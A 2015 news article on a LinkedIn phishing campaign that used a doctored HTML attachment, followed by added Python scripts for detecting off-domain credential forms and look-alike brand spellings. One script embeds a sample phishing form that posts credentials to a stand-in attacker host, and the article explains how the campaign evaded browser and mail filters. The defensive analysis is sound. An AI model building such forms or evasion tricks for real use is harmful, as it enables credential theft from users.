Crooks use interesting methods to evade detection

Jan 15, 2015 15:11 GMT  ·  By
Local copy of the LinkedIn log-in page looks exactly like the real deal

In a recent phishing campaign aimed at harvesting LinkedIn credentials, unsuspecting users are tricked into revealing their username and password for the service through an HTML file attached to the email.

Phishing campaigns are nothing new, but this one recorded a surge over the past week, which prompted security researchers to investigate the operation.

They found that the fraudulent emails carried an attached HTML file containing the same code as the LinkedIn log-in page, with one change: the source had been modified so that whatever is entered in the log-in fields is sent to the attackers instead of to LinkedIn.

Browser anti-phishing protection is bypassed

The recipient is tricked into opening the page by a message claiming that irregular activity has been spotted on their LinkedIn account and that a “compulsory security update” must be performed using the attached form.

“The attachment is a copy of the real LinkedIn.com website. However, the website’s source has been modified, so if the recipient uses this web page to sign in to their LinkedIn account, their credentials will be sent directly to the attacker,” says Satnam Narang, senior security response manager at Symantec, in a blog post.

Using an HTML file rather than a hosted site is significant because a browser’s anti-phishing protection works by checking the URL being visited against blacklists of known fraudulent websites; a page opened from a local file has no such URL to check, so the user never sees a warning.
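One triage check a responder can run on such an attachment is to look at where its sign-in form actually posts credentials. The script below is an added example, not code from Symantec or from the article; the two sample pages are constructed to resemble the attachment described above, the attacker address is a documentation-only IP, and the LinkedIn form path is illustrative.

```python
"""Triage an HTML e-mail attachment: does its sign-in form post credentials off-domain?

Added example (not Symantec's or the article's code). The sample pages below are
constructed to resemble the attachment described in the article; the attacker host
is a made-up TEST-NET address and the LinkedIn form path is illustrative.
"""
from html.parser import HTMLParser
from urllib.parse import urlsplit


class FormScanner(HTMLParser):
    """Collect every <form> in the document and whether it holds a password field."""

    def __init__(self):
        super().__init__()
        self.forms = []          # one dict per <form>: {"action": str, "has_password": bool}
        self._current = None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self._current = {"action": attrs.get("action") or "", "has_password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (attrs.get("type") or "text").lower() == "password":
                self._current["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def offdomain_credential_forms(html, legit_host):
    """Return the action URLs of password-bearing forms that do not post to legit_host.

    A faithful copy of the site posts to the site's own host. In a local .html file an
    empty or relative action would resolve against the file system, and a javascript:
    or data: action has no host at all, so anything whose host is not legit_host or a
    subdomain of it is reported as suspicious.
    """
    scanner = FormScanner()
    scanner.feed(html)
    suspicious = []
    for form in scanner.forms:
        if not form["has_password"]:
            continue
        host = urlsplit(form["action"]).hostname or ""   # hostname comes back lower-cased
        if host != legit_host and not host.endswith("." + legit_host):
            suspicious.append(form["action"])
    return suspicious


# Constructed sample: the markup of the real log-in page, but the form now posts to
# an attacker-controlled server (203.0.113.10 is a documentation-only address).
PHISH_HTML = """
<html><body>
<form method="post" action="http://203.0.113.10/collect.php">
  <input type="text" name="session_key">
  <input type="password" name="session_password">
  <input type="submit" value="Sign in">
</form>
</body></html>
"""

# Constructed sample of an unmodified copy: the form still posts to a LinkedIn host.
LEGIT_HTML = """
<html><body>
<form method="post" action="https://www.linkedin.com/login/submit">
  <input type="text" name="session_key">
  <input type="password" name="session_password">
</form>
</body></html>
"""

if __name__ == "__main__":
    for label, page in (("phish", PHISH_HTML), ("legit", LEGIT_HTML)):
        print(label, offdomain_credential_forms(page, "linkedin.com"))
```

The check only covers credentials submitted through a form’s action attribute. A page can just as easily send the fields with a script (an XMLHttpRequest or a dynamically built URL), so inline and external scripts in the attachment should be searched for destination URLs as well before an attachment is declared clean.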

Email filters circumvented, 2FA recommended

Narang also noticed that the crooks spelled the LinkedIn name in the email with a lowercase “l” in place of the capital “I” (“Linkedln”). The two glyphs are near-identical in many fonts, so the message slips past mail filters looking for the brand name while recipients notice nothing wrong.
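The same look-alike trick is straightforward to detect once the confusable glyphs are folded together before comparing a sender’s display name with a brand. The script below is an added example, not code from the article or Symantec; the From headers are constructed and the addresses are placeholders. It goes slightly beyond the single l-for-I swap the article reports and folds a few other commonly substituted glyphs of the same kind.

```python
"""Spot brand names spelled with look-alike glyphs in a sender's display name.

Added example (not from the article or Symantec). The From headers below are
constructed; the addresses are placeholders.
"""
from email.utils import parseaddr

# Glyph pairs that render nearly identically in common sans-serif fonts. The article
# reports only the lowercase-l-for-capital-I swap; the other entries generalise to
# substitutions of the same kind.
CONFUSABLES = str.maketrans({
    "l": "i",   # lowercase L  -> i  (capital I lower-cases to i, so the two collide)
    "1": "i",   # digit one    -> i
    "|": "i",   # vertical bar -> i
    "0": "o",   # digit zero   -> o
    "5": "s",   # digit five   -> s
})


def fold(text):
    """Collapse confusable glyphs so look-alike spellings compare equal."""
    return text.lower().translate(CONFUSABLES)


def spoofed_brand(from_header, brands):
    """Return the brand a display name imitates with look-alike glyphs, else None.

    A token that is the brand spelled exactly is ordinary use of the name and is not
    flagged; only a token that folds to the brand while being spelled differently
    counts as spoofing.
    """
    display, _address = parseaddr(from_header)
    for token in display.split():
        for brand in brands:
            if token != brand and fold(token) == fold(brand):
                return brand
    return None


# Constructed From headers: the first two mimic the campaign's trick.
SAMPLE_HEADERS = [
    '"Linkedln" <security-update@example.net>',          # lowercase l for capital I
    '"Linkedln Security" <no-reply@example.net>',
    'LinkedIn <messages-noreply@linkedin.com>',           # genuine spelling
    '"PayPa1 Support" <help@example.org>',                # digit one for lowercase l
]

if __name__ == "__main__":
    for header in SAMPLE_HEADERS:
        print(header, "->", spoofed_brand(header, ["LinkedIn", "PayPal"]))
```

This catches only the glyph substitution. A correctly spelled brand name in front of an unrelated sender address is a separate signal, so a mail filter would pair this with a check of the sender domain against the brand’s own domains (and its SPF/DKIM/DMARC results) rather than rely on the display name alone.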

The attackers clearly took pains to evade automated detection and to keep their phishing page usable for longer than a hosted one would be, but users should remember that web services never perform security updates, or any other kind of update, by emailing forms to their customers.

Symantec advises turning on two-factor authentication (2FA) for the LinkedIn account, which is done from the profile’s privacy and security settings. With 2FA enabled, even if the username and password are stolen, a one-time code sent to the owner’s phone must also be entered before a log-in from an unrecognised machine succeeds.

LinkedIn phishing (3 images)

Local copy of the LinkedIn log-in page looks exactly like the real deal
Code that sends credentials to the attacker
Email with fraudulent HTML file attached